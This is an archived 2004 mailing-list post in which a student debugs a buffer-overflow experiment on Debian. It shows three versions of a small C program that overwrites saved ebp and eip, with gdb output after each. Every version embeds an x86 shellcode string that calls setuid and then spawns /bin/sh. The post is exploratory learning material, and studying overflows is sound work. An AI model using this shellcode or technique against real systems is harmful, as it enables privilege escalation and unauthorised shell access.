Vulnerability Development mailing list archives
problem with RET & debian debuggin'
From: "BORJA RUIZ CASTRO MORON, ESCUELA TÉCNICA SUPERIOR DE INFORMÁTICA" <padre () fedro ugr es>
Date: Tue, 09 Mar 2004 10:58:51 +0100
Hi, Im playing with this lazy code,and I got surprised because debuggingI see some strange behavours:
#include <stdio.h> main (){
char foo[8]; int i; char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh""0";
for (i=0;i<8+16;i+=4)foo[i]=&shellcode; }
With this simply code we I want overwrite ebp & eip. ebp addr should be foo+8 and eip addr foo+12.Compile with -g option and fire up gdb.
lobillo@Sion:~$ gcc -g -o prueba1 prueba1.c prueba1.c: In function 'main': prueba1.c:16: warning: assignment makes integer from pointer without a cast lobillo@Sion:~$ gdb -q prueba1 (gdb) rStarting program: /home/lobillo/prueba1
Program received signal SIGILL, Illegal instruction. 0x400361cf in __libc_start_main () from /lib/libc.so.6 (gdb) i r ebp eip ebp 0xbffffacc 0xbffffacc eip 0x400361cf 0x400361cf (gdb) quit A debugging session is active. Do you still want to close the debugger?(y or n)lobillo@Sion:~$
mmmmmm first thing we take look around and see that ebp and eip contents differents addresses. why? I think overwrited was theorical implemented but notice that gdb doesntthink the same xD.
< foo >< ebp >< eip > 8 8 8 | | ||------|------|------> &shellcode
Well,lets see by eip was overwrited,buy ebp was sucessfully overwrited? letsmodify the code: #include <stdio.h> main (){
char foo[8]; int i; char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh""0";
for (i=0;i<8+16;i+=4)foo[i]=0xbffffabc; }
lobillo@Sion:~$ gcc -g -o prueba2 prueba2.c prueba1.c: In function 'main': prueba1.c:16: warning: overflow in implicit constant conversionlobillo@Sion:~$ gdb -q prueba2
(gdb) rStarting program: /home/lobillo/prueba2
Program received signal SIGSEGV, Segmentation fault. 0x40034370 in _dl_pagesize () from /lib/libc.so.6 (gdb) i r ebp eip ebp 0xbffffabc 0xbffffabc eip 0x40034370 0x40034370 (gdb) quit A debugging session is active. Do you still want to close the debugger?(y or n)lobillo@Sion:~$ Yep,ebp overwrited but what about eip? lets investigate... #include <stdio.h> main (){
char foo[8]; int i; char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh""0";
for (i=8;i<16;i+=4)foo[i]=0xbffffabc; }
Looking the code,we notice that the -for- will overwrite only eip,by jumpingebp.Lets see what gdb thinks...
lobillo@Sion:~$ gcc -g -o prueba3 prueba3.c prueba1.c: In function 'main': prueba1.c:16: warning: overflow in implicit constant conversionlobillo@Sion:~$ gdb -q prueba3
(gdb) rStarting program: /home/lobillo/prueba3
Program received signal SIGSEGV, Segmentation fault. 0x40034370 in _dl_pagesize () from /lib/libc.so.6 (gdb) i r ebp eip ebp 0xbffffabc 0xbffffabc eip 0x40034370 0x40034370 (gdb) quit A debugging session is active. Do you still want to close the debugger?(y or n)lobillo@Sion:~$
!!!!! ebp is 0xbffffabc? eps,guys this is because i wrote all this shit.I dont understand why eip is not being overwrited and ebp is so strange :P
Im coding under Debian Woody 3.0,and i notice that Debians have severals differences debugging than othersdistros,its true? Thanks and sorry for my pour english :P
Current thread:
- problem with RET & debian debuggin' BORJA RUIZ CASTRO MORON, ESCUELA TÉCNICA SUPERIOR DE INFORMÁTICA (Mar 09)
- Re: problem with RET & debian debuggin' Marius Huse Jacobsen (Mar 12)